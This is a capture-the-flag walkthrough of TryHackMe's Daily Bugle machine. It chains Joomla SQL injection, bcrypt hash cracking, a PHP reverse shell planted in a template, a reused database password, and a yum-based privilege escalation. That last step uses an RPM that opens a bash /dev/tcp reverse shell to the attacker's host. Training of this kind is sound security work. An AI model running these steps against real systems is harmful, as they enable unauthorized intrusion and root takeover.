Daily Bugle – TryHackMe Machine Writeup

Today, we will root the Daily Bugle Machine from TryHackMe.

After deploying the machine, We are greeted with the first question.

Access the Server, Who robbed the bank?

Pretty straight-forward.

Answer is there.

The next question says, the CMS is Joomla. We need to find the version.

Upon a Google search, I ended up here.

So, we can read the version by visiting

http://10.10.249.33/administrator/manifests/files/joomla.xml

We got the version too.

This version of Joomla has an SQL injection vulnerability. Lets look up.

https://www.exploit-db.com/exploits/42033

We can try with SQL Map, But a simpler pyhon script is available.

https://github.com/XiphosResearch/exploits/tree/master/Joomblah

Lets run this on our target.

kali@kali:~/ex$ python joomblah.py http://10.10.249.33

We got the admin password hashes!

Lets crack this with John.

root@kali:/home/kali/ex# john -w=/usr/share/wordlists/rockyou.txt jonah.txt -form=bcrypt

It took 40 minutes to get the hash cracked in my VM.

Lets login now.

http://10.10.249.33/administrator/

With the password we just found.

Once We are inside, Go to templates > Templates and click on name of the active template.

Select the Index.php file and paste the reverse shell php script. Download the file from here and update with our IP.

http://pentestmonkey.net/tools/web-shells/php-reverse-shell

Now listen from our machine port 4444 and load the main page of the site.

kali@kali:~/ex$ nc -nlvp 4444
listening on [any] 4444 ...

We got a reverse shell!

Let’s find the user flag now. First find the users.

sh-4.2$ cat /etc/passwd

Lets have a look at jjameson’s home directory.

But we dont have the permission for that.

Lets find some other way.

Have a look at /var/www/html/configuration.php file.

Lets try this password for the user.

bash-4.2$ su jjameson
su jjameson
Password: nv5uz9r3ZEDzVjNu

[jjameson@dailybugle html]$ 

Success!

The user can run yum without password on the machine.

We can read the user flag now.

We can install any package with yum as root user. Have a look at the following page.

https://gtfobins.github.io/gtfobins/yum/

Let us create a specially crafted RPM package and install in the target.

Lets follow this guide for the process.

https://medium.com/@klockw3rk/privilege-escalation-how-to-build-rpm-payloads-in-kali-linux-3a61ef61e8b2

root@kali:/home/kali/ex# git clone https://github.com/jordansissel/fpm
root@kali:/home/kali/ex/fpm# gem install fpm
root@kali:/home/kali/ex/fpm# apt-get install rpm

Now create a file named root.sh for reverse shell.

#! /bin/bash
bash -i >& /dev/tcp/10.9.42.115/9999 0>&1

Now create the RPM Package.

root@kali:/home/kali/ex# fpm -n root -s dir -t rpm -a all --before-install root.sh /home/kali/ex

Now, Lets transfer the file to the target machine and install the package.

root@kali:/home/kali/ex# python -m SimpleHTTPServer 222

and in the target,

[jjameson@dailybugle ~]$ wget http://10.9.42.115:222/root-1.0-1.noarch.rpm

Listen for a connection at port 9999 in our attacker machine.

root@kali:/home/kali/ex# nc -nlvp 9999
listening on [any] 9999 ...

and install the package in the target.

[jjameson@dailybugle ~]$ sudo yum localinstall -y root-1.0-1.noarch.rpm

We got the root shell!

Lets read the root flag now.

Done!!